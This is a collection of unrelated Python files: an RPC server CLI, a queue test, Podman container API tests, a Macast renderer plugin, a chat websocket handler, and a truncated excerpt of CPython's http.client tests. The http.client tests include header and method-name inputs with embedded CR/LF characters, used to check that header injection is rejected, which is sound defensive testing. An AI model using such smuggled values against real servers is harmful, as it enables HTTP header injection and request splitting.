req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_multiprocessing.py
|
import time
import multiprocessing as mp
from multiprocessing.queues import Queue
def fill_queue(queue_x, queue_y):
""" Endless process that fills the queue"""
task = 0
while True:
time.sleep(0.00000001)
queue_x.put(task)
task += 1
queue_y.put(task)
# print(f"Added task {task}")
task += 1
def queue_get_all(queue_x, queue_y):
a = 0
while a < 2:
time.sleep(0.5)
items_x = []
items_y = []
while not queue_x.empty() and not queue_y.empty():
items_x.append(queue_x.get())
items_y.append(queue_y.get())
print(items_x)
print(items_y)
print(len(items_x))
print(len(items_y))
a += 1
if __name__ == '__main__':
queue_x = Queue(maxsize=-1, ctx=mp.get_context())
    queue_y = Queue(maxsize=-1, ctx=mp.get_context())
task_fill_queue = mp.Process(target=fill_queue, args=(queue_x,queue_y))
task_fill_queue.daemon = True
task_fill_queue.start()
# read_queue(queue)
queue_get_all(queue_x, queue_y)
task_fill_queue.terminate()
task_fill_queue.join()
|
test_v2_0_0_container.py
|
import multiprocessing
import queue
import random
import threading
import unittest
import requests
import time
from dateutil.parser import parse
from .fixtures import APITestCase
class ContainerTestCase(APITestCase):
def test_list(self):
r = requests.get(self.uri("/containers/json"), timeout=5)
self.assertEqual(r.status_code, 200, r.text)
obj = r.json()
self.assertEqual(len(obj), 1)
def test_list_filters(self):
r = requests.get(
self.podman_url
+ "/v1.40/containers/json?filters%3D%7B%22status%22%3A%5B%22running%22%5D%7D"
)
self.assertEqual(r.status_code, 200, r.text)
payload = r.json()
containerAmnt = len(payload)
self.assertGreater(containerAmnt, 0)
def test_list_all(self):
r = requests.get(self.uri("/containers/json?all=true"))
self.assertEqual(r.status_code, 200, r.text)
self.assertId(r.content)
def test_inspect(self):
r = requests.get(self.uri(self.resolve_container("/containers/{}/json")))
self.assertEqual(r.status_code, 200, r.text)
self.assertId(r.content)
_ = parse(r.json()["Created"])
r = requests.post(
self.podman_url + "/v1.40/containers/create?name=topcontainer",
json={
"Cmd": ["top"],
"Image": "alpine:latest",
"Healthcheck": {
"Test": ["CMD", "pidof", "top"],
"Interval": 5000000000,
"Timeout": 2000000000,
"Retries": 3,
"StartPeriod": 5000000000,
},
},
)
self.assertEqual(r.status_code, 201, r.text)
payload = r.json()
container_id = payload["Id"]
self.assertIsNotNone(container_id)
r = requests.get(self.podman_url + f"/v1.40/containers/{container_id}/json")
self.assertEqual(r.status_code, 200, r.text)
self.assertId(r.content)
out = r.json()
self.assertIsNotNone(out["State"].get("Health"))
self.assertListEqual(["CMD", "pidof", "top"], out["Config"]["Healthcheck"]["Test"])
self.assertEqual(5000000000, out["Config"]["Healthcheck"]["Interval"])
self.assertEqual(2000000000, out["Config"]["Healthcheck"]["Timeout"])
self.assertEqual(3, out["Config"]["Healthcheck"]["Retries"])
self.assertEqual(5000000000, out["Config"]["Healthcheck"]["StartPeriod"])
r = requests.get(self.uri(f"/containers/{container_id}/json"))
self.assertEqual(r.status_code, 200, r.text)
self.assertId(r.content)
out = r.json()
hc = out["Config"]["Healthcheck"]["Test"]
self.assertListEqual(["CMD", "pidof", "top"], hc)
r = requests.post(self.podman_url + f"/v1.40/containers/{container_id}/start")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(self.podman_url + f"/v1.40/containers/{container_id}/json")
self.assertEqual(r.status_code, 200, r.text)
out = r.json()
state = out["State"]["Health"]
self.assertIsInstance(state, dict)
def test_stats(self):
r = requests.get(self.uri(self.resolve_container("/containers/{}/stats?stream=false")))
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
self.assertId(r.content)
r = requests.get(
self.uri(self.resolve_container("/containers/{}/stats?stream=false&one-shot=true"))
)
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
self.assertId(r.content)
def test_delete(self):
r = requests.delete(self.uri(self.resolve_container("/containers/{}?force=true")))
self.assertEqual(r.status_code, 200, r.text)
def test_stop(self):
r = requests.post(self.uri(self.resolve_container("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(self.uri(self.resolve_container("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_start(self):
r = requests.post(self.uri(self.resolve_container("/containers/{}/stop")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(self.uri(self.resolve_container("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
def test_restart(self):
r = requests.post(self.uri(self.resolve_container("/containers/{}/start")))
self.assertIn(r.status_code, (204, 304), r.text)
r = requests.post(self.uri(self.resolve_container("/containers/{}/restart")), timeout=5)
self.assertEqual(r.status_code, 204, r.text)
def test_resize(self):
r = requests.post(self.uri(self.resolve_container("/containers/{}/resize?h=43&w=80")))
self.assertIn(r.status_code, (200, 409), r.text)
if r.status_code == 200:
self.assertEqual(r.text, "", r.text)
def test_attach(self):
self.skipTest("FIXME: Test timeouts")
r = requests.post(self.uri(self.resolve_container("/containers/{}/attach?logs=true")), timeout=5)
self.assertIn(r.status_code, (101, 500), r.text)
def test_logs(self):
r = requests.get(self.uri(self.resolve_container("/containers/{}/logs?stdout=true")))
self.assertEqual(r.status_code, 200, r.text)
r = requests.post(
self.podman_url + "/v1.40/containers/create?name=topcontainer",
json={"Cmd": ["top", "ls"], "Image": "alpine:latest"},
)
self.assertEqual(r.status_code, 201, r.text)
payload = r.json()
container_id = payload["Id"]
self.assertIsNotNone(container_id)
r = requests.get(
self.podman_url
+ f"/v1.40/containers/{payload['Id']}/logs?follow=false&stdout=true&until=0"
)
self.assertEqual(r.status_code, 200, r.text)
r = requests.get(
self.podman_url
+ f"/v1.40/containers/{payload['Id']}/logs?follow=false&stdout=true&until=1"
)
self.assertEqual(r.status_code, 200, r.text)
def test_commit(self):
r = requests.post(self.uri(self.resolve_container("/commit?container={}")))
self.assertEqual(r.status_code, 200, r.text)
self.assertId(r.content)
obj = r.json()
self.assertIsInstance(obj, dict)
def test_prune(self):
name = f"Container_{random.getrandbits(160):x}"
r = requests.post(
self.podman_url + f"/v1.40/containers/create?name={name}",
json={
"Cmd": ["cp", "/etc/motd", "/motd.size_test"],
"Image": "alpine:latest",
"NetworkDisabled": True,
},
)
self.assertEqual(r.status_code, 201, r.text)
create = r.json()
r = requests.post(self.podman_url + f"/v1.40/containers/{create['Id']}/start")
self.assertEqual(r.status_code, 204, r.text)
r = requests.post(self.podman_url + f"/v1.40/containers/{create['Id']}/wait")
self.assertEqual(r.status_code, 200, r.text)
wait = r.json()
self.assertEqual(wait["StatusCode"], 0, wait["Error"])
prune = requests.post(self.podman_url + "/v1.40/containers/prune")
self.assertEqual(prune.status_code, 200, prune.status_code)
prune_payload = prune.json()
self.assertGreater(prune_payload["SpaceReclaimed"], 0)
self.assertIn(create["Id"], prune_payload["ContainersDeleted"])
# Delete any orphaned containers
r = requests.get(self.podman_url + "/v1.40/containers/json?all=true")
self.assertEqual(r.status_code, 200, r.text)
        for container in r.json():
            requests.delete(
                self.podman_url + f"/v1.40/containers/{container['Id']}?force=true"
            )
# Image prune here tied to containers freeing up
prune = requests.post(self.podman_url + "/v1.40/images/prune")
self.assertEqual(prune.status_code, 200, prune.text)
prune_payload = prune.json()
self.assertGreater(prune_payload["SpaceReclaimed"], 0)
# FIXME need method to determine which image is going to be "pruned" to fix test
# TODO should handler be recursive when deleting images?
# self.assertIn(img["Id"], prune_payload["ImagesDeleted"][1]["Deleted"])
# FIXME (@vrothberg): I commented this line out during the `libimage` migration.
# It doesn't make sense to report anything to be deleted if the reclaimed space
# is zero. I think the test needs some rewrite.
# self.assertIsNotNone(prune_payload["ImagesDeleted"][1]["Deleted"])
def test_status(self):
r = requests.post(
self.podman_url + "/v1.40/containers/create?name=topcontainer",
json={"Cmd": ["top"], "Image": "alpine:latest"},
)
self.assertEqual(r.status_code, 201, r.text)
payload = r.json()
container_id = payload["Id"]
self.assertIsNotNone(container_id)
r = requests.get(
self.podman_url + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = r.json()
self.assertEqual(payload[0]["Status"], "Created")
r = requests.post(self.podman_url + f"/v1.40/containers/{container_id}/start")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(
self.podman_url + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = r.json()
self.assertTrue(str(payload[0]["Status"]).startswith("Up"))
r = requests.post(self.podman_url + f"/v1.40/containers/{container_id}/pause")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(
self.podman_url + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = r.json()
self.assertTrue(str(payload[0]["Status"]).startswith("Up"))
self.assertTrue(str(payload[0]["Status"]).endswith("(Paused)"))
r = requests.post(self.podman_url + f"/v1.40/containers/{container_id}/unpause")
self.assertEqual(r.status_code, 204, r.text)
r = requests.post(self.podman_url + f"/v1.40/containers/{container_id}/stop")
self.assertEqual(r.status_code, 204, r.text)
r = requests.get(
self.podman_url + "/v1.40/containers/json",
params={"all": "true", "filters": f'{{"id":["{container_id}"]}}'},
)
self.assertEqual(r.status_code, 200, r.text)
payload = r.json()
self.assertTrue(str(payload[0]["Status"]).startswith("Exited"))
r = requests.delete(self.podman_url + f"/v1.40/containers/{container_id}")
self.assertEqual(r.status_code, 204, r.text)
def test_top_no_stream(self):
uri = self.uri(self.resolve_container("/containers/{}/top"))
q = queue.Queue()
def _impl(fifo):
fifo.put(requests.get(uri, params={"stream": False}, timeout=2))
top = threading.Thread(target=_impl, args=(q,))
top.start()
time.sleep(2)
self.assertFalse(top.is_alive(), f"GET {uri} failed to return in 2s")
qr = q.get(False)
self.assertEqual(qr.status_code, 200, qr.text)
qr.close()
top.join()
def test_top_stream(self):
uri = self.uri(self.resolve_container("/containers/{}/top"))
q = queue.Queue()
stop_thread = False
def _impl(fifo, stop):
try:
with requests.get(uri, params={"stream": True, "delay": 1}, stream=True) as r:
r.raise_for_status()
fifo.put(r)
for buf in r.iter_lines(chunk_size=None):
if stop():
break
fifo.put(buf)
except Exception:
pass
top = threading.Thread(target=_impl, args=(q, (lambda: stop_thread)))
top.start()
time.sleep(4)
self.assertTrue(top.is_alive(), f"GET {uri} exited too soon")
stop_thread = True
for _ in range(10):
try:
qr = q.get_nowait()
if qr is not None:
self.assertEqual(qr.status_code, 200)
qr.close()
break
except queue.Empty:
pass
finally:
time.sleep(1)
else:
self.fail("Server failed to respond in 10s")
top.join()
def test_memory(self):
r = requests.post(
self.podman_url + "/v1.4.0/libpod/containers/create",
json={
"Name": "memory",
"Cmd": ["top"],
"Image": "alpine:latest",
"Resource_Limits": {
"Memory":{
"Limit": 1000,
},
"CPU":{
"Shares": 200,
},
},
},
)
self.assertEqual(r.status_code, 201, r.text)
payload = r.json()
container_id = payload["Id"]
self.assertIsNotNone(container_id)
r = requests.get(self.podman_url + f"/v1.40/containers/{container_id}/json")
self.assertEqual(r.status_code, 200, r.text)
self.assertId(r.content)
out = r.json()
self.assertEqual(2000, out["HostConfig"]["MemorySwap"])
self.assertEqual(1000, out["HostConfig"]["Memory"])
if __name__ == "__main__":
unittest.main()
|
example.py
|
# Copyright (c) 2021 by xfangfang. All Rights Reserved.
#
# Macast Dummy media renderer
#
# Macast Metadata
# <macast.title>Dummy Renderer</macast.title>
# <macast.renderer>DummyRenderer</macast.renderer>
# <macast.platform>darwin,linux,win32</macast.platform>
# <macast.version>0.1</macast.version>
# <macast.author>xfangfang</macast.author>
# <macast.desc>Macast Dummy media renderer</macast.desc>
import os
import time
import threading
import cherrypy
import subprocess
from macast import cli
from macast.renderer import Renderer
class DummyRenderer(Renderer):
def __init__(self):
super(DummyRenderer, self).__init__()
self.start_position = 0
self.position_thread_running = True
self.position_thread = threading.Thread(target=self.position_tick, daemon=True)
self.position_thread.start()
def position_tick(self):
while self.position_thread_running:
time.sleep(1)
self.start_position += 1
sec = self.start_position
position = '%d:%02d:%02d' % (sec // 3600, (sec % 3600) // 60, sec % 60)
self.set_state_position(position)
def set_media_stop(self):
self.set_state_transport('STOPPED')
cherrypy.engine.publish('renderer_av_stop')
def set_media_url(self, url):
self.set_media_stop()
self.start_position = 0
print(url)
self.set_state_transport("PLAYING")
cherrypy.engine.publish('renderer_av_uri', url)
def stop(self):
super(DummyRenderer, self).stop()
self.set_media_stop()
print("Dummy stop")
cherrypy.engine.publish('renderer_av_stop')
def start(self):
super(DummyRenderer, self).start()
print("Dummy start")
if __name__ == '__main__':
cli(DummyRenderer())
|
socket.py
|
import json
import threading
import time
import websocket
class SocketHandler():
def __init__(self, client, socket_trace=False):
"""
Build the websocket connection.
client: client that owns the websocket connection.
"""
self.socket_url = "wss://ws1.narvii.com"
self.client = client
self.active = False
self.headers = None
self.socket = None
self.socket_thread = None
self.reconnect = True
websocket.enableTrace(socket_trace)
def on_open(self):
return 1
def on_close(self):
self.active = False
if self.reconnect:
self.start()
print("reopened")
print("closed")
def on_ping(self, data):
self.socket.sock.pong(data)
def handle_message(self, data):
self.client.handle_socket_message(data)
return
def send(self, data):
self.socket.send(data)
def start(self):
self.headers = {
"NDCDEVICEID": self.client.device_id,
"NDCAUTH": f"sid={self.client.sid}"
}
self.socket = websocket.WebSocketApp(
f"{self.socket_url}/?signbody={self.client.device_id}%7C{int(time.time() * 1000)}",
on_message=self.handle_message,
on_open=self.on_open,
on_close=self.on_close,
on_ping=self.on_ping,
header=self.headers
)
self.socket_thread = threading.Thread(target=self.socket.run_forever, kwargs={"ping_interval": 60})
self.socket_thread.daemon = True
self.socket_thread.start()
self.active = True
def close(self):
self.reconnect = False
self.active = False
self.socket.close()
class Callbacks:
def __init__(self, client):
"""
Build the callback handler.
        This is meant to be subclassed, with the desired methods redefined as needed.
client: Client to be used
"""
self.client = client
self.methods = {
1000: self._resolve_chat_message
}
self.chat_methods = {
"0:0": self.on_text_message,
"0:100": self.on_image_message,
"0:103": self.on_youtube_message,
"2:110": self.on_voice_message,
"3:113": self.on_sticker_message,
"101:0": self.on_group_member_join,
"102:0": self.on_group_member_leave,
"103:0": self.on_chat_invite
}
def _resolve_chat_message(self, data):
"""
        Resolves to a chat method based on the data's `chatMessage > type` and `chatMessage > mediaType` parameters.
        If there is no `mediaType`, the default fallback value `0` is used.
        Returns the return value of the appropriate method.
"""
key = f"{data['o']['chatMessage']['type']}:{data['o']['chatMessage'].get('mediaType', 0)}"
return self.chat_methods.get(key, self.default)(data)
def resolve(self, data):
"""
Resolves to a method based on the data's `t` parameter.
        Returns the return value of the appropriate method.
"""
data = json.loads(data)
return self.methods.get(data["t"], self.default)(data)
def on_text_message(self, data):
"""
Called when a text chat message is received.
"""
pass
def on_image_message(self, data):
pass
def on_youtube_message(self, data):
pass
def on_voice_message(self, data):
pass
def on_sticker_message(self, data):
pass
def on_group_member_join(self, data):
pass
def on_group_member_leave(self, data):
pass
def on_chat_invite(self, data):
pass
def default(self, data):
"""
Called when the parameter `t` is not matched.
"""
pass
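# A minimal sketch (not part of this module) of how Callbacks is meant to be used:
# subclass it and override only the handlers of interest. The nested 'o' and
# 'chatMessage' keys are the same ones _resolve_chat_message() reads above.
# Usage (illustrative): EchoCallbacks(client).resolve(raw_frame)
class EchoCallbacks(Callbacks):
    def on_text_message(self, data):
        # data is the already-parsed frame handed over by resolve()
        print(data['o']['chatMessage'])
    def on_group_member_join(self, data):
        print('member joined:', data['o']['chatMessage'])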
|
test_httplib.py
|
import enum
import errno
from http import client, HTTPStatus
import io
import itertools
import os
import array
import re
import socket
import threading
import warnings
import unittest
from unittest import mock
TestCase = unittest.TestCase
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import warnings_helper
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = socket_helper.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
def test_headers_debuglevel(self):
body = (
b'HTTP/1.1 200 OK\r\n'
b'First: val\r\n'
b'Second: val1\r\n'
b'Second: val2\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock, debuglevel=1)
with support.captured_stdout() as output:
resp.begin()
lines = output.getvalue().splitlines()
self.assertEqual(lines[0], "reply: 'HTTP/1.1 200 OK\\r\\n'")
self.assertEqual(lines[1], "header: First: val")
self.assertEqual(lines[2], "header: Second: val1")
self.assertEqual(lines[3], "header: Second: val2")
class HttpMethodTests(TestCase):
def test_invalid_method_names(self):
methods = (
'GET\r',
'POST\n',
'PUT\n\r',
'POST\nValue',
'POST\nHOST:abc',
'GET\nrHost:abc\n',
'POST\rRemainder:\r',
'GET\rHOST:\n',
'\nPUT'
)
for method in methods:
with self.assertRaisesRegex(
ValueError, "method can't contain control characters"):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.request(method=method, url="/")
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
